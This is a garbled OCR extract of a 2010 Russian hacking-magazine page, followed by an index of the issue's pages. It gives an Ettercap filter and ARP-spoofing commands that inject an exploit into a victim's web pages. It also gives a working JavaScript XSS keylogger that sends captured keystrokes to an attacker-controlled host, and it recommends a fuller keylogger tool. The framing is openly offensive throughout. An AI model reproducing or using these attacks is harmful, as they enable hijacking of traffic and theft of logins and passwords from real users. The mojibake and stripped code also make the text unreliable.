img - Xakep Online

More documents

Recommendations

Info

ВЗЛОМ//Èùåì ñòðîêóif (search(DATA.data, "Accept-Encoding")) {//Çàìåíÿåì íà ìóñîðreplace("Accept-Encoding", "Blabla-Blahblah");//Ìåññàãà äëÿ íàñmsg("Accept-Encoding field has been changed\n");}}//Åñëè ïðîòîêîë – TCP, èñõîäÿùèé ïîðò – 80if (ip.proto == TCP && tcp.src == 80) {replace("", " \" ");// Ìåíÿåì îòâåò ñåðâåðà – HTML-ñòðàíèöó, ïîäñòàâëÿÿêàêîé-òî ñâîé ñïëîéòreplace(""," ");msg("Success!\n"); //Ìåññàãà äëÿ íàñ}плюс — они присутствуют почти на всех HTML-страничках в единичномчисле, что повысит шансы на успешную эксплуатацию уязвимости прималом количестве запросов к нашему серваку. Но все зависит от ситуации,браузера жертвы и т.д. Еще пара моментов: функция «replace»регистрозависима, то есть можно повторить искомые строчки в разныхрегистрах, а функция «msg» выводит нам сообщения в логах, чтобы мызнали, когда правило задействовалось.Далее требуется переварить наш текстовый файл с фильтром в удобоваримыйдля Ettercap’a вид. Пишем в консоли:etterfilter http_filter.txt -o http_filter.efГде http_filter.txt — наш файл с фильтром, а в «-o http_filter.ef» указываемимя будущего Еttercap-фильтра (необязательная опция).Далее запускаем сам Ettercap.ettercap -T -F http_filter.ef -M ARP /192.168.0.1/Для создания фильтров к Ettercap существует примитивный «язык»,которым мы и воспользовались. Здесь мы создали два «правила».Первое применяется к пакетам, отправленным на 80 порт по протоколуTCP. Обычно это запросы браузера на открытие той или иной страницывеб-серверу. В них ищем строчку «Accept-Encoding» (поле стандартногоHTTP-заголовка, посылаемого браузером) и меняем ее на любойдругой текст того же размера (это важно). Требуется это, потому чтообычно в «Accept-Encoding» указывается, что ответы от веб-сервераможно сжимать. Но по сжатым данным мы не сможем провести необходимоенам изменение HTML-страниц. Поэтому мы меняем это поле начто-нибудь другое. Сервер же при разборе пропустит это кривое полеи ответит нам в несжатом виде. Второе правило применяется уже кпринимаемым данным. Ситуация похожая. Делаем выборку пакетов отвеб-сервера (протокол TCP, исходящий порт — 80). И меняем строчки«», «» на либо яваскриптовский, либо рисунок-сплойт,не суть важно. Почему именно эти теги будем менять? У них есть одинГде опция «-T» указывает на то, что мы запускаем текстовую версиюEttercap; «-F http_filter.ef» — подключаем полученный от Etterfilterфильтр; «-M ARP /192.168.0.1/» — указываем Ettercap, что требуетсязапустить MitM атаку, а именно — arp-спуфинг (в Ettercap входит ещенесколько классических атак). 192.168.0.1– IP шлюза. Кроме встроенности,бонусы использования встроенного arp-спуффинга еще и втом, что после своей работы сниффер восстанавливает ARP таблицы,посылая правильные значения, к тому же не надо заморачиваться средиректами. В итоге Ettercap будет фильтровать трафик от нашейжертвы, добавляя в конец каждой HTML’ки наш сплойт. Как понимаешь,Ettercap — тулза крутая. Особенно с возможностями фильтров, аони широки. Это и изменение, декодирование пакетов, и использованиерегекспов, и запуск команд... Основную инфу можно почерпнутьиз man’ов и прилагаемых к Ettercap’у примеров. Кстати, если будешьразбираться с этой тулзой, то помни, что она не сниффит трафик,посылаемый машиной, на которой она установлена.¹ 4ЗАДАЧА: ОБЛЕГЧИТЬ СБОРИНФОРМАЦИИ.РЕШЕНИЕ:В своих околохакерских или житейских делах мы часто сталкиваемсяс необходимостью поиска информации. Будь то сбор информации окаком-то сервере или поиски какого-то эксплойта (или поиски любви :)).Я уверен, что каждый из нас имеет кучку закладок к основным ресурсамдля этого. Также есть всевозможные плагины для ускорения этого дела.Но в обоих случаях ты привязываешься к определенному компьютеру/софту (особенно когда пользуешься разными браузерами). Есть, конечно,решения этой трудности, но... Хочу поделиться находкой, котораячрезвычайно порадовала меня — сервис на http://yehg.net/q. По сути,это агрегатор кучи всевозможных поисковых (и не только) систем.Ввел что-то в строку поиска и снизу увидел выборку с гугла, один клик— и уже с вики. Но это не было бы настолько интересно, если бы не двевещи. Во-первых, yehg — это хакерская группа, потому и сервис заточенпод задачи, связанные с информационной безопасностью. Поэтому тут ипоисковики по сплойтам, уязвимостям, и всяческие whois’ы да портсканеры,кодеры/декодеры и т.д. Кстати, очень советую просмотреть весьнабор сайтов. Подборка действительно хороша, на все случаи жизни,как говорится. Можно что-то для себя выделить, запомнить.Второй же плюс заключается в том, что это — общедоступный «веб-агрегатор»поисковиков (gosu.pl/wsa/). Он очень простой, так как используеттолько JavaScript и фреймы. То есть может работать даже локально ине привязан к браузеру.Поэтому его можно быстро и легко настроить под себя.Для того, чтобы добавить какой-то поисковик, требуется всего лишьвставить строчку в HTML’ку агрегатора. Например, добавим поиск посайту журнала. Ищем и добавляем:CATS["General"] = {…Прикрученный поиск по сайту xakep.ru040 XÀÊÅÐ 08 /139/ 10
"xakep": "http://www.xakep.ru/local/search/search.asp?text=%s",…};Где %s — место, куда будет вставляться та строка, которую ты ищешь.В итоге в категории «General» у нас появится пункт «xakep». Всепросто. Причем можно ввести дополнительный текст или параметрык запросу. Как это сделано, например, в поиске сплойтов по гуглу, гдедобавляется к введенному запросу «(vulnerability or vulnerabilities)OR (exploits or security holes)», и в итоге нам надо вводить тольконазвание ПО.Версия агрегатора, используемая YEHG, явно более продвинутая,чем от разработчика. Там есть и многострочное окошко для запроса,и возможность редактирования итогового запроса. К тому же поосновным сайтам поиск уже организован. Хотя она и с «мусором»(реферы на группу), удалить его не составит труда. В общем, надиске приложена именно она.¹ 5ЗАДАЧА: УКРАСТЬ ЛОГИН, ПАРОЛЬПОСРЕДСТВОМ XSS И КЕЙЛОГГЕРА.РЕШЕНИЕ:XSS бывают разные: активные, пассивные. Первые, конечно, более опасны,так как остаются на серваке, но и со вторыми можно кое-что сваять.Что очень хорошо для нас — XSS-уязвимости чрезвычайно распространены.Это связано и со сложностями защиты от них, но что важнее — собщим отношением к ним, даже у специалистов в области ИБ. Ведь многиене считают XSS за юзабельную уязвимость! Давай посмотрим. Какнасчет кейлоггера через XSS? Примитивный кейлоггер состоит из двухкомпонентов: самого JavaScript’а, отвечающего за перехват нажатий иотправку данных о них, ну и сервера, который будет принимать и сохранятьданные. Потому нам требуется левый (можно бесплатный) сервак споддержкой, например, PHP. JavaScript (код с insanesecurity.info):var keys=''; //îïðåäåëÿåì ïåðåìåííóþdocument.onkeypress = function(e) {//ïåðåõâàòûâàåì íàæàòèÿget = window.event?event:e; //ïåðåõâàòûâàåì ñîáûòèåkey = get.keyCode?get.keyCode:get.charCode;//ïîëó÷åíèå êîäà íàæàòîé êíîïêèkey = String.fromCharCode(key); //ïåðåâîä êîäà â íîðì âèäkeys+=key; //êó÷êóåì íàæàòèÿ â ñòðî÷êó}window.setInterval(function(){//îòïðàâëÿåì äàííûå ÷åðåç âðåìåííûå ïðîìåæóòêènew Image().src = 'http://òâîé_õîñò:80/keylogger.php?keys='+keys; //ïåðåäàåì äàííûå ñêðèïòókeys = ''; //ñáðàñûâàåì ïåðåìåííóþ}, 1000);Логика такова: скрипт перехватывает нажатия клавиш и сохраняет их впеременную, а через определенные промежутки времени коннектится кнашему PHP-скрипту, передавая полученную переменную в запросе.Далее заливаем на сервер PHP-скрипт:В зависимости от ситуации, пихаем либо сам код, либо ссылку на негочерез XSS на сервер или пользователю. Теперь все нажатия клавишпользователя на странице с нашим яваскриптом будут сохранены нанашем сервере.Но это был скорее показательный пример.Качественный яваскрипт-кейлоггер ты можешь взять с sourceforge.net/projects/jskeylogger/ (либо на диске). Версия 1.4. Суть здесь та же —скрипт и сервер. Но реализация гораздо лучше: при сохранении логаотмечается поле, в которое вводились данные и уникальный ID вводаданных, так что с парсингом нет вообще никаких проблем. Несколькостранно, что сервер здесь реализован в виде exe’шника на питоне. Ноперенос на PHP, например, проблем вызвать не должен. В архиве такжеприлагается пара примеров, все очень показательно. Один существенныйминус данного логгера — нет поддержки русского языка. Но ее, ядумаю, нетрудно будет прикрутить. Использование кейлоггера не всегдавозможно и не всегда оправдано. Но в определенных случаях мы можемполучить большие бонусы, чем, например, от классической кражи кукисов,так как данные мы получаем неизмененные, незашифрованные. Такчто стоить помнить о такой штуке.zjskeylogger v1.4 в работе: IP, уникальный ID, имена полей и перехваченный ввод данныхXÀÊÅÐ 08 /139/ 10041
Page 1: ВЗЛОМ АУТЕНТИФИКАЦ
Page 4 and 5: MegaNews004 Все новое за
Page 6: MEGANEWSМАРИЯ «MIFRILL» НЕ
Page 10 and 11: MEGANEWSÈÇÐÀÈËÜ ÂÅÐÁÓÅ
Page 13 and 14: Реклама11
Page 15 and 16: ÑÏÅÖÑËÓÆÁÛ ÑØÀ ÍÅÃ
Page 17 and 18: ÓÒÅ×ÊÀ ÑÅÊÐÅÒÍÎÉ È
Page 19 and 20: с помощью специаль
Page 21 and 22: Pro3Q QOO!TOWER ION9400 ðóá.ÒÅ
Page 23 and 24: VIEWSONICVOT120 PC MiniÒÅÕÍÈ×
Page 25 and 26: codinglotus.xakep.ruX-testing сont
Page 28 and 29: PC_ZONEСтепан «Step» Иль
Page 30 and 31: PC_ZONEВносим важные п
Page 32 and 33: PC_ZONEАлександр Лозо
Page 34 and 35: PC_ZONEПример асинхро
Page 36 and 37: PC_ZONEКапитан Улитка
Page 38 and 39: PC_ZONEПодробные логи
Page 40 and 41: ВЗЛОМТюрин «GreenDog»
Page 44 and 45: ВЗЛОМАлексей Синцо
Page 46 and 47: ВЗЛОМAcrobat Reader. Эксп
Page 48 and 49: ВЗЛОМЭтого достато
Page 50 and 51: ВЗЛОМИз ARP-сообщени
Page 52 and 53: ВЗЛОМANTI-NATO natobreak@yahoo
Page 54 and 55: ВЗЛОМНет, конечно,
Page 56 and 57: ВЗЛОМЗазеркалье —
Page 58 and 59: ВЗЛОМ«HellMilitia» and «my
Page 60 and 61: ВЗЛОМXOR_KEY, между пр
Page 62 and 63: ВЗЛОМRAZ0R HTTP://RAZ0R.NAMEП
Page 64 and 65: ВЗЛОММаг icq 884888, http:/
Page 66: ВЗЛОММой шелл на azar
Page 69 and 70: Результат переполн
Page 71 and 72: Описание:access violation
Page 73 and 74: ÂÛÃÎÄÀ•ÃÀÐÀÍÒÈß•
Page 75 and 76: Граббер сайтовНакр
Page 77 and 78: Разбор вывода анти
Page 79 and 80: Реклама
Page 81 and 82: Кристалл запустилс
Page 83 and 84: Зачем и почему нужн
Page 85 and 86: ÔÓÒÓÐÈÑÒÈ×ÍÛÉ ÑÈÍÃ
Page 87 and 88: них мы, конечно, не
Page 89 and 90: в понедельник вот п
Page 91 and 92: Выбор режима работ
Page 93 and 94:
Все вспомогательны
Page 95 and 96:
Реклама
Page 97 and 98:
WARNINGwarningРедактируе
Page 99 and 100:
Оптимизируем работ
Page 101 and 102:
WARNINGСокращенная ст
Page 103 and 104:
ldd для Firefoxне в них.
Page 105 and 106:
Реклама
Page 107 and 108:
codingMasterBotBotBotСхема ц
Page 109 and 110:
codingINFOРезультат раб
Page 111 and 112:
codingФорма HoldemConsoleФо
Page 113 and 114:
codingÑàéòû ïî òåìåПр
Page 115 and 116:
codingАдреса загрузки
Page 117 and 118:
CODINGdeeonis deeonis@gmail.comКО
Page 119 and 120:
поймать в месте выз
Page 121 and 122:
ëà äëÿ «Îäíîêëàññí
Page 123 and 124:
ñîäåðæàùèå çàïðåùå
Page 125 and 126:
FORWARD="80>192.168.0.100" â ôà
Page 127 and 128:
OpenBSD, pf и NATîòêðûòûé
Page 129 and 130:
SYN/ACKЕвгений Зобнин
Page 131 and 132:
Apache с различными MPM-
Page 133 and 134:
Слоеный пирог типи
Page 135 and 136:
×òîáû óñòàíîâèòü vSp
Page 137 and 138:
INFOКлиент управлени
Page 139 and 140:
информацию с перер
Page 141 and 142:
Если хочешь быть пр
Page 143 and 144:
обновляемого на са
Page 145 and 146:
x№ 08(139)АВГУСТ 2010>>WIND
show all

img - Xakep Online

You also want an ePaper? Increase the reach of your titles

Delete template?

Save as template?